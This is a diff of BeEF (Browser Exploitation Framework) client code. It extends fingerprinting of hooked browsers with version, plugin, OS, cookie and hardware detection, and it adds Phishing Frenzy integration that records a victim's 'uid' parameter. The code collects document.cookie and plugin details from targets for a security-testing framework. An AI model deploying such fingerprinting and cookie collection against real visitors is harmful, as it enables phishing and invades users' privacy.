     * @example: beef.browser.type().IE6
@@ -881,7 +1185,27 @@ beef.browser = {
            C35iOS: this.isC35iOS(), // Chrome 35 on iOS
            C36: this.isC36(), // Chrome 36
            C36iOS: this.isC36iOS(), // Chrome 36 on iOS
-            
+            C37: this.isC37(), // Chrome 37
+            C37iOS: this.isC37iOS(), // Chrome 37 on iOS
+            C38: this.isC38(), // Chrome 38
+            C38iOS: this.isC38iOS(), // Chrome 38 on iOS
+            C39: this.isC39(), // Chrome 39
+            C39iOS: this.isC39iOS(), // Chrome 39 on iOS
+            C40: this.isC40(), // Chrome 40
+            C40iOS: this.isC40iOS(), // Chrome 40 on iOS
+            C41: this.isC41(), // Chrome 41
+            C41iOS: this.isC41iOS(), // Chrome 41 on iOS
+            C42: this.isC42(), // Chrome 42
+            C42iOS: this.isC42iOS(), // Chrome 42 on iOS
+            C43: this.isC43(), // Chrome 43
+            C43iOS: this.isC43iOS(), // Chrome 43 on iOS
+            C44: this.isC44(), // Chrome 44
+            C44iOS: this.isC44iOS(), // Chrome 44 on iOS
+            C45: this.isC45(), // Chrome 45
+            C46: this.isC46(), // Chrome 46
+            C47: this.isC47(), // Chrome 46
+            C45iOS: this.isC45iOS(), // Chrome 45 on iOS
+
            C: this.isC(), // Chrome any version

            FF2: this.isFF2(), // Firefox 2
@@ -911,8 +1235,23 @@ beef.browser = {
            FF24: this.isFF24(), // Firefox 24
            FF25: this.isFF25(), // Firefox 25
            FF26: this.isFF26(), // Firefox 26
-            FF26: this.isFF27(), // Firefox 27
-            FF26: this.isFF28(), // Firefox 28
+            FF27: this.isFF27(), // Firefox 27
+            FF28: this.isFF28(), // Firefox 28
+            FF29: this.isFF29(), // Firefox 29
+            FF30: this.isFF30(), // Firefox 30
+            FF31: this.isFF31(), // Firefox 31
+            FF32: this.isFF32(), // Firefox 32
+            FF33: this.isFF33(), // Firefox 33
+            FF34: this.isFF34(), // Firefox 34
+            FF35: this.isFF35(), // Firefox 35
+            FF36: this.isFF36(), // Firefox 36
+            FF37: this.isFF37(), // Firefox 37
+            FF38: this.isFF38(), // Firefox 38
+            FF39: this.isFF39(), // Firefox 39
+            FF40: this.isFF40(), // Firefox 40
+            FF41: this.isFF41(), // Firefox 41
+            FF42: this.isFF42(), // Firefox 42
+            FF43: this.isFF43(), // Firefox 43
            FF: this.isFF(),   // Firefox any version

            IE6: this.isIE6(), // Internet Explorer 6
@@ -933,6 +1272,8 @@ beef.browser = {
            S4: this.isS4(), // Safari 4.xx
            S5: this.isS5(), // Safari 5.xx
            S6: this.isS6(), // Safari 6.x
+            S7: this.isS7(), // Safari 7.x
+            S8: this.isS8(), // Safari 8.x
            S: this.isS()   // Safari any version
        }
    },
@@ -1145,6 +1486,87 @@ beef.browser = {
            return '36'
        }
        ;   // Chrome 36 for iOS
+        if (this.isC37()) {
+            return '37'
+        }
+        ;   // Chrome 37
+        if (this.isC37iOS()) {
+            return '37'
+        }
+        ;   // Chrome 37 for iOS
+        if (this.isC38()) {
+            return '38'
+        }
+        ;   // Chrome 38
+        if (this.isC38iOS()) {
+            return '38'
+        }
+        ;   // Chrome 38 for iOS
+        if (this.isC39()) {
+            return '39'
+        }
+        ;   // Chrome 39
+        if (this.isC39iOS()) {
+            return '39'
+        }
+        ;   // Chrome 39 for iOS
+        if (this.isC40()) {
+            return '40'
+        }
+        ;   // Chrome 40
+        if (this.isC40iOS()) {
+            return '40'
+        }
+        ;   // Chrome 40 for iOS
+        if (this.isC41()) {
+            return '41'
+        }
+        ;   // Chrome 41
+        if (this.isC41iOS()) {
+            return '41'
+        }
+        ;   // Chrome 41 for iOS
+        if (this.isC42()) {
+            return '42'
+        }
+        ;   // Chrome 42
+        if (this.isC42iOS()) {
+            return '42'
+        }
+        ;   // Chrome 42 for iOS
+        if (this.isC43()) {
+            return '43'
+        }
+        ;   // Chrome 43
+        if (this.isC43iOS()) {
+            return '43'
+        }
+        ;   // Chrome 43 for iOS
+        if (this.isC44()) {
+            return '44'
+        }
+        ;   // Chrome 44
+        if (this.isC44iOS()) {
+            return '44'
+        }
+        ;   // Chrome 44 for iOS
+        if (this.isC45()) {
+            return '45'
+        }
+        ;   // Chrome 45
+        if (this.isC46()) {
+            return '46'
+        }
+        ;// Chrome 46
+        if (this.isC47()) {
+            return '47'
+        }
+        ;// Chrome 47
+        if (this.isC45iOS()) {
+            return '45'
+        }
+        ;   // Chrome 45 for iOS
+
        if (this.isFF2()) {
            return '2'
        }
@@ -1261,6 +1683,66 @@ beef.browser = {
            return '28'
        }
        ;   // Firefox 28
+        if (this.isFF29()) {
+            return '29'
+        }
+        ;   // Firefox 29
+        if (this.isFF30()) {
+            return '30'
+        }
+        ;   // Firefox 30
+        if (this.isFF31()) {
+            return '31'
+        }
+        ;   // Firefox 31
+        if (this.isFF32()) {
+            return '32'
+        }
+        ;   // Firefox 32
+        if (this.isFF33()) {
+            return '33'
+        }
+        ;   // Firefox 33
+        if (this.isFF34()) {
+            return '34'
+        }
+        ;   // Firefox 34
+        if (this.isFF35()) {
+            return '35'
+        }
+        ;   // Firefox 35
+        if (this.isFF36()) {
+            return '36'
+        }
+        ;   // Firefox 36
+        if (this.isFF37()) {
+            return '37'
+        }
+        ;   // Firefox 37
+        if (this.isFF38()) {
+            return '38'
+        }
+        ;   // Firefox 38
+        if (this.isFF39()) {
+            return '39'
+        }
+        ;   // Firefox 39
+        if (this.isFF40()) {
+            return '40'
+        }
+        ;   // Firefox 40
+        if (this.isFF41()) {
+            return '41'
+        }
+        ;   // Firefox 41
+        if (this.isFF42()) {
+            return '42'
+        }
+        ;   // Firefox 42
+        if (this.isFF43()) {
+            return '43'
+        }
+        ;   // Firefox 43

        if (this.isIE6()) {
            return '6'
@@ -1300,6 +1782,15 @@ beef.browser = {
        }
        ;	// Safari 6

+        if (this.isS7()) {
+            return '7'
+        }
+        ;	// Safari 7
+        if (this.isS8()) {
+            return '8'
+        }
+        ;       // Safari 8
+
        if (this.isO9_52()) {
            return '9.5'
        }
@@ -1392,17 +1883,21 @@ beef.browser = {
            flash_versions = 12;
            flash_installed = false;

-            if (window.ActiveXObject) {
-                for (x = 2; x <= flash_versions; x++) {
-                    try {
-                        Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
-                        if (Flash) {
-                            flash_installed = true;
+
+            if (this.type().IE11) {
+                flash_installed = (navigator.plugins["Shockwave Flash"] != undefined);
+            } else {
+                if (window.ActiveXObject != null) {
+                    for (x = 2; x <= flash_versions; x++) {
+                        try {
+                            Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
+                            if (Flash) {
+                                flash_installed = true;
+                            }
+                        } catch (e) {
+                            beef.debug("Creating Flash ActiveX object failed: " + e.message);
                        }
                    }
-                    catch (e) {
-                        beef.debug("Creating Flash ActiveX object failed: " + e.message);
-                    }
                }
            }
            return flash_installed;
@@ -1419,8 +1914,7 @@ beef.browser = {

        var quicktime = false;

-        // Not Internet Explorer
-        if (!this.type().IE) {
+        if (this.capabilities()["navigator.plugins"]) {

            for (i = 0; i < navigator.plugins.length; i++) {

@@ -1430,7 +1924,7 @@ beef.browser = {

            }

-            // Internet Explorer
+            // Has navigator.plugins
        } else {

            try {
@@ -1461,8 +1955,8 @@ beef.browser = {

        var realplayer = false;

-        // Not Internet Explorer
-        if (!this.type().IE) {
+        if (this.capabilities()["navigator.plugins"]) {
+

            for (i = 0; i < navigator.plugins.length; i++) {

@@ -1472,7 +1966,7 @@ beef.browser = {

            }

-            // Internet Explorer
+            // has navigator.plugins
        } else {

            var definedControls = [
@@ -1512,8 +2006,8 @@ beef.browser = {

        var wmp = false;

-        // Not Internet Explorer
-        if (!this.type().IE) {
+        if (this.capabilities()["navigator.plugins"]) {
+

            for (i = 0; i < navigator.plugins.length; i++) {

@@ -1523,7 +2017,7 @@ beef.browser = {

            }

-            // Internet Explorer
+            // Has navigator.plugins
        } else {

            try {
@@ -1574,13 +2068,8 @@ beef.browser = {
     * @example: if(beef.browser.javaEnabled()) { ... }
     */
    javaEnabled: function () {
-        //Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
-        // versionJRE = deployJava.getJREs();

-        // if(versionJRE != '')
-        //     return true;
-        //  else
-        return false;
+        return navigator.javaEnabled();

    },

@@ -1624,9 +2113,11 @@ beef.browser = {
     * @example: if(beef.browser.hasJava()) { ... }
     */
    hasJava: function () {
-
-        return beef.browser.javaEnabled();
-
+        if (beef.browser.getPlugins().match(/java/i) && beef.browser.javaEnabled()) {
+          return true;
+        } else {
+          return false;
+        }
    },

    /**
@@ -1656,8 +2147,8 @@ beef.browser = {
            return r;
        };

-        // Internet Explorer
-        if (this.isIE()) this.getPluginsIE();
+        // Things lacking navigator.plugins
+        if (!this.capabilities()["navigator.plugins"]) this.getPluginsIE();

        // All other browsers that support navigator.plugins
        else if (navigator.plugins && navigator.plugins.length > 0) {
@@ -1778,16 +2269,6 @@ beef.browser = {
                        catch (e) {
                        }
                    }},
-                'Silverlight_Plug-In': {
-                    'control': 'Silverlight Plug-In',
-                    'return': function (control) {
-                        try {
-                            version = navigator.plugins['Silverlight Plug-In']["description"];
-                            return 'Silverlight Plug-In Version ' + version;//+ " description "+ filename;
-                        }
-                        catch (e) {
-                        }
-                    }},
                'FoxitReader_Plugin': {
                    'control': 'FoxitReader Plugin',
                    'return': function (control) {
@@ -1943,10 +2424,21 @@ beef.browser = {
        var page_uri = (document.location.href) ? document.location.href : "Unknown";
        var page_referrer = (document.referrer) ? document.referrer : "Unknown";
        var hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
-        var hostport = (document.location.port) ? document.location.port : "80";
+        switch (document.location.protocol) {
+            case "http:":
+                var default_port = "80";
+                break;
+            case "https:":
+                var default_port = "443";
+                break
+            default:
+                var default_port = "";
+        }
+        var hostport = (document.location.port) ? document.location.port : default_port;
        var browser_plugins = beef.browser.getPlugins();
        var date_stamp = new Date().toString();
        var os_name = beef.os.getName();
+        var os_version = beef.os.getVersion();
        var default_browser = beef.os.getDefaultBrowser();
        var hw_name = beef.hardware.getName();
        var cpu_type = beef.hardware.cpuType();
@@ -1964,15 +2456,14 @@ beef.browser = {
        var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
        var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
        var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
-        var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
        var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
        var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
        var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
-        var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
        try {
            var cookies = document.cookie;
-            var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
-            var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
+            var veglol = beef.browser.cookie.veganLol();
+            var has_session_cookies = (beef.browser.cookie.hasSessionCookies(veglol)) ? "Yes" : "No";
+            var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies(veglol)) ? "Yes" : "No";
            if (cookies) details['Cookies'] = cookies;
            if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
            if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
@@ -1995,6 +2486,7 @@ beef.browser = {
        if (hostport) details['HostPort'] = hostport;
        if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
        if (os_name) details['OsName'] = os_name;
+        if (os_version) details['OsVersion'] = os_version;
        if (default_browser) details['DefaultBrowser'] = default_browser;
        if (hw_name) details['Hardware'] = hw_name;
        if (cpu_type) details['CPU'] = cpu_type;
@@ -2011,11 +2503,27 @@ beef.browser = {
        if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
        if (has_webrtc) details['HasWebRTC'] = has_webrtc;
        if (has_activex) details['HasActiveX'] = has_activex;
-        if (has_silverlight) details['HasSilverlight'] = has_silverlight;
        if (has_quicktime) details['HasQuickTime'] = has_quicktime;
        if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
        if (has_wmp) details['HasWMP'] = has_wmp;
-        if (has_foxit) details['HasFoxit'] = has_foxit;
+
+        var pf_integration = "<%= @phishing_frenzy_enable %>";
+        if (pf_integration) {
+            var pf_param = "uid";
+            var pf_victim_uid = "";
+            var location_search = window.location.search.substring(1);
+            var params = location_search.split('&');
+            for (var i = 0; i < params.length; i++) {
+                var param_entry = params[i].split('=');
+                if (param_entry[0] == pf_param) {
+                    pf_victim_uid = param_entry[1];
+                    details['PhishingFrenzyUID'] = pf_victim_uid;
+                    break;
+                }
+            }
+        } else {
+            details['PhishingFrenzyUID'] = "N/A";
+        }

        return details;
    },
@@ -2218,11 +2726,12 @@ beef.browser = {
    /**
     * Get the browser language
     */
-    getBrowserLanguage: function(){
+    getBrowserLanguage: function () {
        var l = 'Unknown';
-        try{
-          l = window.navigator.userLanguage || window.navigator.language;
-        }catch(e){}
+        try {
+            l = window.navigator.userLanguage || window.navigator.language;
+        } catch (e) {
+        }
        return l;
    },

--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -71,12 +71,36 @@ beef.browser.cookie = {
 			( ( domain ) ? ";domain=" + domain : "" ) +
 			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
 		},
+
+		veganLol: function (){
+			var to_hell= '';
+			var min = 17;
+			var max = 25;
+			var lol_length = Math.floor(Math.random() * (max - min + 1)) + min;
+
+			var grunt = function(){
+				var moo = Math.floor(Math.random() * 62);
+				var char = '';
+				if(moo < 36){
+					char = String.fromCharCode(moo + 55);
+				}else{
+					char = String.fromCharCode(moo + 61);
+				}
+				if(char != ';' && char != '='){
+					return char;
+				}else{
+					return 'x';
+				}
+			};
+
+			while(to_hell.length < lol_length){
+				to_hell += grunt();
+			}
+			return to_hell;
+		},
 		
-		hasSessionCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', '', '/', '', '' );
+		hasSessionCookies: function (name){
+			this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );

 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
@@ -84,11 +108,8 @@ beef.browser.cookie = {
 			
 		},

-		hasPersistentCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', 1, '/', '', '' );
+		hasPersistentCookies: function (name){
+			this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );

 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -1,129 +1,167 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

 beef.hardware = {

-	ua: navigator.userAgent,
+  ua: navigator.userAgent,

-	cpuType: function() {
-		// IE
-		if (typeof navigator.cpuClass != 'undefined') {
-			cpu = navigator.cpuClass;
-			if (cpu == "x86")   return "32-bit";
-			if (cpu == "68K")   return "Motorola 68K";
-			if (cpu == "PPC")   return "Motorola PPC";
-			if (cpu == "Alpha") return "Digital";
-			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
-			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
-		// Firefox
-        } else if (typeof navigator.oscpu != 'undefined') {
-			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
-		}
-		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
-		return "32-bit";
-	},
+  /*
+   * @return: {String} CPU type
+   **/
+  cpuType: function() {
+    var arch = 'UNKNOWN';
+    // note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
+    // in detecting the OS arch rather than the browser build
+    if (navigator.userAgent.match('(WOW64|x64|x86_64)') || navigator.platform.toLowerCase() == "win64"){
+      arch = 'x86_64';
+    }else if(typeof navigator.cpuClass != 'undefined'){
+      switch (navigator.cpuClass) {
+        case '68K':
+          arch = 'Motorola 68K';
+          break;
+        case 'PPC':
+          arch = 'Motorola PPC';
+          break;
+        case 'Digital':
+          arch = 'Alpha';
+          break;
+        default:
+          arch = 'x86';
+      }
+    }
+    // TODO we can infer the OS is 64 bit, if we first detect the OS type (os.js).
+    // For example, if OSX is at least 10.7, most certainly is 64 bit.
+    return arch;
+  },

-	isTouchEnabled: function() {
-		if ('ontouchstart' in document) return true;
-		return false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isTouchEnabled: function() {
+    if ('ontouchstart' in document) return true;
+    return false;
+  },

-	isVirtualMachine: function() {
-		if (screen.width % 2 || screen.height % 2) return true;
-		return false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isVirtualMachine: function() {
+    if (screen.width % 2 || screen.height % 2) return true;
+    return false;
+  },

-	isLaptop: function() {
-		// Most common laptop screen resolution
-		if (screen.width == 1366 && screen.height == 768) return true;
-		// Netbooks
-		if (screen.width == 1024 && screen.height == 600) return true;
-		return false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isLaptop: function() {
+    // Most common laptop screen resolution
+    if (screen.width == 1366 && screen.height == 768) return true;
+    // Netbooks
+    if (screen.width == 1024 && screen.height == 600) return true;
+    return false;
+  },

-	isNokia: function() {
-		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isNokia: function() {
+    return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+  },

-	isZune: function() {
-		return (this.ua.match('ZuneWP7')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isZune: function() {
+    return (this.ua.match('ZuneWP7')) ? true : false;
+  },

-	isHtc: function() {
-		return (this.ua.match('HTC')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isHtc: function() {
+    return (this.ua.match('HTC')) ? true : false;
+  },

-	isEricsson: function() {
-		return (this.ua.match('Ericsson')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isEricsson: function() {
+    return (this.ua.match('Ericsson')) ? true : false;
+  },

-	isMotorola: function() {
-		return (this.ua.match('Motorola')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isMotorola: function() {
+    return (this.ua.match('Motorola')) ? true : false;
+  },

-	isGoogle: function() {
-		return (this.ua.match('Nexus One')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isGoogle: function() {
+    return (this.ua.match('Nexus One')) ? true : false;
+  },

-        /**
-         * Returns true if the browser is on a Mobile Phone
-         * @return: {Boolean} true or false
-         *
-         * @example: if(beef.hardware.isMobilePhone()) { ... }
-         **/
-        isMobilePhone: function() {
-            return DetectMobileQuick();
-        },
+  /**
+   * Returns true if the browser is on a Mobile Phone
+   * @return: {Boolean} true or false
+   *
+   * @example: if(beef.hardware.isMobilePhone()) { ... }
+   **/
+  isMobilePhone: function() {
+    return DetectMobileQuick();
+  },

-	getName: function() {
-                var ua = navigator.userAgent.toLowerCase();
-                if(DetectIphone())              { return "iPhone"};
-                if(DetectIpod())                { return "iPod Touch"};
-                if(DetectIpad())                { return "iPad"};
-		if (this.isHtc())               { return 'HTC'};
-		if (this.isMotorola())          { return 'Motorola'};
-		if (this.isZune())              { return 'Zune'};
-		if (this.isGoogle())            { return 'Google Nexus One'};
-		if (this.isEricsson())          { return 'Ericsson'};
-                if(DetectAndroidPhone())        { return "Android Phone"};
-                if(DetectAndroidTablet())       { return "Android Tablet"};
-                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
-                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
-                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
-                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
-                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
-                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
-		if (this.isNokia())             { return 'Nokia'};
-                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
-                if(DetectWindowsMobile())       { return "Windows Mobile"};
-                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
-                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
-                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
-                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
-                if(DetectBlackBerry())          { return "BlackBerry"};
-                if(DetectPalmOS())              { return "Palm OS"};
-                if(DetectPalmWebOS())           { return "Palm Web OS"};
-                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
-                if(DetectArchos())              { return "Archos"}
-                if(DetectBrewDevice())          { return "Brew"};
-                if(DetectDangerHiptop())        { return "Danger Hiptop"};
-                if(DetectMaemoTablet())         { return "Maemo Tablet"};
-                if(DetectSonyMylo())            { return "Sony Mylo"};
-                if(DetectAmazonSilk())          { return "Kindle Fire"};
-                if(DetectKindle())              { return "Kindle"};
-                if(DetectSonyPlaystation())                 { return "Playstation"};
-                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
-                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
-                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
-                if(DetectXbox())                            { return "Xbox"};
-				if(this.isLaptop())							{ return "Laptop"};
-                if(this.isVirtualMachine())                 { return "Virtual Machine"};
+  getName: function() {
+    var ua = navigator.userAgent.toLowerCase();
+    if(DetectIphone())              { return "iPhone"};
+    if(DetectIpod())                { return "iPod Touch"};
+    if(DetectIpad())                { return "iPad"};
+    if (this.isHtc())               { return 'HTC'};
+    if (this.isMotorola())          { return 'Motorola'};
+    if (this.isZune())              { return 'Zune'};
+    if (this.isGoogle())            { return 'Google Nexus One'};
+    if (this.isEricsson())          { return 'Ericsson'};
+    if(DetectAndroidPhone())        { return "Android Phone"};
+    if(DetectAndroidTablet())       { return "Android Tablet"};
+    if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+    if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+    if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+    if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+    if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+    if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+    if (this.isNokia())             { return 'Nokia'};
+    if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+    if(DetectWindowsMobile())       { return "Windows Mobile"};
+    if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+    if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+    if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+    if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+    if(DetectBlackBerry())          { return "BlackBerry"};
+    if(DetectPalmOS())              { return "Palm OS"};
+    if(DetectPalmWebOS())           { return "Palm Web OS"};
+    if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+    if(DetectArchos())              { return "Archos"}
+    if(DetectBrewDevice())          { return "Brew"};
+    if(DetectDangerHiptop())        { return "Danger Hiptop"};
+    if(DetectMaemoTablet())         { return "Maemo Tablet"};
+    if(DetectSonyMylo())            { return "Sony Mylo"};
+    if(DetectAmazonSilk())          { return "Kindle Fire"};
+    if(DetectKindle())              { return "Kindle"};
+    if(DetectSonyPlaystation())                 { return "Playstation"};
+    if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+    if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+    if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+    if(DetectXbox())                            { return "Xbox"};
+    if(this.isLaptop())                         { return "Laptop"};
+    if(this.isVirtualMachine())                 { return "Virtual Machine"};

-		return 'Unknown';
-	}
+    return 'Unknown';
+  }
 };

 beef.regCmp('beef.hardware');
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -69,13 +69,11 @@ function beef_init() {
            beef.net.browser_details();
            beef.updater.execute_commands();
            beef.logger.start();
-            beef.are.init();
        }else {
            beef.net.browser_details();
            beef.updater.execute_commands();
            beef.updater.check();
            beef.logger.start();
-            beef.are.init();
        }
    }
 }
--- a/core/main/client/lib/deployJava.js
+++ b/core/main/client/lib/deployJava.js
@@ -70,16 +70,10 @@ var deployJava = function() {
        hattrs.events);
    var applet_valid_attrs = hattrs.applet.concat(hattrs.core);

-    // generic log function, use console.log unless it isn't available
-    // then revert to alert()
+    // generic log function
    function log(message) {
        if ( ! rv.debug ) {return};
-
-        if (console.log) {
-            console.log(message);
-        } else {
-            alert(message);
-        }
+        beef.debug(message);
    }

    //checks where given version string matches query
@@ -1298,4 +1292,4 @@ var deployJava = function() {
    }

    return rv;
-}();
+}();
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/lib/jquery.blockUI.js
+++ b/core/main/client/lib/jquery.blockUI.js
@@ -0,0 +1,620 @@
+/*!
+ * jQuery blockUI plugin
+ * Version 2.70.0-2014.11.23
+ * Requires jQuery v1.7 or later
+ *
+ * Examples at: http://malsup.com/jquery/block/
+ * Copyright (c) 2007-2013 M. Alsup
+ * Dual licensed under the MIT and GPL licenses:
+ * http://www.opensource.org/licenses/mit-license.php
+ * http://www.gnu.org/licenses/gpl.html
+ *
+ * Thanks to Amir-Hossein Sobhi for some excellent contributions!
+ */
+
+;(function() {
+/*jshint eqeqeq:false curly:false latedef:false */
+"use strict";
+
+	function setup($) {
+		$.fn._fadeIn = $.fn.fadeIn;
+
+		var noOp = $.noop || function() {};
+
+		// this bit is to ensure we don't call setExpression when we shouldn't (with extra muscle to handle
+		// confusing userAgent strings on Vista)
+		var msie = /MSIE/.test(navigator.userAgent);
+		var ie6  = /MSIE 6.0/.test(navigator.userAgent) && ! /MSIE 8.0/.test(navigator.userAgent);
+		var mode = document.documentMode || 0;
+		var setExpr = $.isFunction( document.createElement('div').style.setExpression );
+
+		// global $ methods for blocking/unblocking the entire page
+		$.blockUI   = function(opts) { install(window, opts); };
+		$.unblockUI = function(opts) { remove(window, opts); };
+
+		// convenience method for quick growl-like notifications  (http://www.google.com/search?q=growl)
+		$.growlUI = function(title, message, timeout, onClose) {
+			var $m = $('<div class="growlUI"></div>');
+			if (title) $m.append('<h1>'+title+'</h1>');
+			if (message) $m.append('<h2>'+message+'</h2>');
+			if (timeout === undefined) timeout = 3000;
+
+			// Added by konapun: Set timeout to 30 seconds if this growl is moused over, like normal toast notifications
+			var callBlock = function(opts) {
+				opts = opts || {};
+
+				$.blockUI({
+					message: $m,
+					fadeIn : typeof opts.fadeIn  !== 'undefined' ? opts.fadeIn  : 700,
+					fadeOut: typeof opts.fadeOut !== 'undefined' ? opts.fadeOut : 1000,
